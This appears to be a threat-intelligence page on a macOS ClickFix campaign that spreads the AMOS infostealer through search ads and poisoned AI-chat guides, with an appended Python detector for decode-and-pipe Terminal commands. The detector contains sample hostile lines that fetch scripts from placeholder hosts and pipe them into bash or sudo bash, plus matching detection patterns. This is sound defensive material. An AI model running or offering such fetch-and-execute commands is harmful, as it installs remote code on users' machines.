macOS infostealer campaign using fake ads and ClickFix lures
Campaign
Summary
macOS users are being targeted in a ClickFix campaign that abuses Google search ads to steer people into poisoned ChatGPT and Grok conversations. The lure uses troubleshooting queries and searches related to OpenAI's Atlas browser to surface "fix" instructions that, if pasted into macOS Terminal, decode a base64-encoded URL and launch a bash script that installs the AMOS infostealer with root-level privileges. The activity matters because AMOS is a macOS-only malware-as-a-service operation, and the campaign shows threat actors abusing legitimate AI platforms and search infrastructure to distribute malware.
Related Happenings
SHub Reaper macOS infostealer variant
Malware Activity
First: 19.05.2026 00:42
Last: 19.05.2026 00:42
Sources 1
About this happening:
The **SHub Reaper** macOS infostealer now uses **AppleScript** and a fake **Apple security update** lure to infect Macs, raising the risk of credential theft and remote access. It...
Mini Shai-Hulud npm supply-chain malware wave
Malware Activity
First: 12.05.2026 14:07
Last: 12.05.2026 14:07
Sources 1
About this happening:
The **Sha1-Hulud** npm supply-chain campaign is a fresh **second wave** of **Shai-Hulud**-style activity that has compromised **hundreds of npm packages**. The malware runs during...
Fake Claude Code installation-page infostealer campaign targeting developers
Campaign
First: 11.05.2026 17:00
Last: 11.05.2026 17:00
Sources 1
About this happening:
A **fake Claude Code** installer campaign is using **sponsored search results** and **operator-controlled domains** to deliver an **infostealer** to **developer workstations**, pu...
Open-OSS/privacy-filter Hugging Face infostealer activity
Malware Activity
First: 11.05.2026 10:05
Last: 11.05.2026 10:05
Sources 1
About this happening:
A malicious **Hugging Face repository** called **Open-OSS/privacy-filter** impersonated **OpenAI's Privacy Filter** and delivered a **Rust-based information stealer** to **Windows...
Vidar Stealer ClickFix campaign targeting multiple sectors
Campaign
First: 08.05.2026 14:00
Last: 08.05.2026 14:00
Sources 1
About this happening:
The **Vidar Stealer** campaign is using **ClickFix** social engineering and compromised **WordPress** sites to deliver password-stealing malware, widening risk for **infrastructur...
Timeline
04.02.2026 09:42 · 6 articles
Microsoft warns on expanding macOS infostealer campaigns
Initial Disclosure: Microsoft warned that information-stealing campaigns are rapidly expanding beyond Windows to Apple macOS environments, using Python, malicious Google Ads redirects, ClickFix lures, and fake sites to deliver DMG installers that deploy Atomic macOS Stealer (AMOS), MacSync, DigitStealer, and PXA Stealer. The activity uses fileless execution, native macOS utilities, AppleScript automation, registry Run keys or scheduled tasks, and Telegram-based communications and exfiltration, while related campaigns also used WhatsApp and Crystal PDF decoys. The theft targets browser credentials, session data, iCloud Keychain entries, developer secrets, financial information, and crypto wallet data. The recommended defenses are user education, Terminal monitoring, iCloud Keychain monitoring, and inspection of network egress for suspicious POST requests.
- Microsoft Warns Python Infostealers Target macOS via Fake Ads and Installers — thehackernews.com — 04.02.2026 09:42
- Claude LLM artifacts abused to push Mac infostealers in ClickFix attack — www.bleepingcomputer.com — 13.02.2026 22:21
- Hackers abuse Google ads, Claude.ai chats to push Mac malware — www.bleepingcomputer.com — 10.05.2026 20:52
- LastPass: Fake password managers infect Mac users with malware — www.bleepingcomputer.com — 22.09.2025 18:36
- Google ads for shared ChatGPT, Grok guides push macOS infostealer malware — www.bleepingcomputer.com — 11.12.2025 01:50
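The Terminal side of the chain in the summary above, and the "Terminal monitoring" defense Microsoft recommends in the 04.02.2026 entry, come down to the same command shape: a base64 blob decoded in the shell, the result fetched with curl, and the download piped into bash, sometimes under sudo. The Python below is an added example, not code from this page, from Microsoft, or from any vendor; it triages captured shell command lines (for example from an EDR process-creation feed or a user's shell history) for that pattern. The sample commands and the example.invalid hostnames are constructed for the demonstration and are not campaign indicators.

```python
import base64
import re
from dataclasses import dataclass, field

# Constructed samples (NOT real indicators). The first and third mimic the
# ClickFix shape described on the page: a base64-encoded URL or command is
# decoded in Terminal and the fetched script is piped into bash.
def _b64(s: str) -> str:
    return base64.b64encode(s.encode()).decode()

SAMPLE_COMMANDS = [
    f"echo {_b64('https://example.invalid/fix.sh')} | base64 -d | xargs curl -fsSL | bash",
    "curl -fsSL https://example.invalid/install.sh | sudo bash",
    f'bash -c "$(echo {_b64("curl -s https://example.invalid/a.sh | bash")} | base64 -D)"',
    "ls -la ~/Downloads",
    "base64 -d cert.b64 > cert.der",        # decoding alone is benign
    "cat /var/log/system.log | grep -i error",
]

B64_BLOB = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
URL = re.compile(r"https?://[^\s'\"|;&)]+")
# macOS (BSD) base64 historically takes -D for decode; newer builds also accept -d.
DECODE_STAGE = re.compile(r"\bbase64\s+(-[dD]\b|--decode\b)")
DOWNLOADER = re.compile(r"\b(curl|wget)\b")
# "| bash", "| sudo sh", "bash -c", "sh <(...)", "$(...)" substitution, eval
SHELL_EXEC = re.compile(
    r"(\|\s*(sudo\s+)?(ba|z)?sh\b|\b(ba|z)?sh\s+-c\b|\b(ba|z)?sh\s+<\(|\$\(|\beval\b)"
)
PRIV = re.compile(r"\bsudo\b")
APPLESCRIPT = re.compile(r"\bosascript\b")


@dataclass
class Verdict:
    command: str
    indicators: list[str] = field(default_factory=list)
    hidden_urls: list[str] = field(default_factory=list)
    suspicious: bool = False


def decode_blobs(command: str) -> list[str]:
    """Base64-decode every long alphabet run in the command; keep what decodes to UTF-8 text."""
    decoded = []
    for m in B64_BLOB.finditer(command):
        blob = m.group(0)
        try:
            raw = base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
            decoded.append(raw.decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            continue  # random identifiers rarely decode to clean text
    return decoded


def analyze(command: str) -> Verdict:
    """Score one command line. Flags only when an execution sink is combined
    with obfuscation (base64 stage / hidden URL) or a remote fetch."""
    v = Verdict(command=command)
    decoded = decode_blobs(command)
    # Look at the visible command plus every layer hidden inside base64.
    joined = "\n".join([command] + decoded)

    if DECODE_STAGE.search(command):
        v.indicators.append("base64 decode stage")
    for text in decoded:
        v.hidden_urls.extend(URL.findall(text))
    if v.hidden_urls:
        v.indicators.append("URL hidden in base64")
    if DOWNLOADER.search(joined):
        v.indicators.append("downloader")
    if SHELL_EXEC.search(joined):
        v.indicators.append("pipe/substitution into shell")
    if PRIV.search(joined):
        v.indicators.append("sudo")
    if APPLESCRIPT.search(joined):
        v.indicators.append("osascript")

    obfuscated = "base64 decode stage" in v.indicators or bool(v.hidden_urls)
    fetch = "downloader" in v.indicators
    execution = "pipe/substitution into shell" in v.indicators
    v.suspicious = execution and (obfuscated or fetch)
    return v


def scan(commands: list[str]) -> list[Verdict]:
    """Return verdicts for the suspicious commands only."""
    return [v for v in (analyze(c) for c in commands) if v.suspicious]


if __name__ == "__main__":
    for v in scan(SAMPLE_COMMANDS):
        print(f"SUSPICIOUS: {v.command}")
        print(f"  indicators: {', '.join(v.indicators)}")
        if v.hidden_urls:
            print(f"  hidden URLs: {v.hidden_urls}")
```

Decoding alone is deliberately not enough to alert (the `cert.b64` sample stays quiet); the signal is a decode stage or downloader feeding a shell sink, which is exactly what a ClickFix victim is asked to paste. Feed `scan()` the command-line field of Terminal process events or a user's `~/.zsh_history`, and treat any hidden URL it recovers as the egress destination to check against the suspicious-POST review the 04.02.2026 entry recommends.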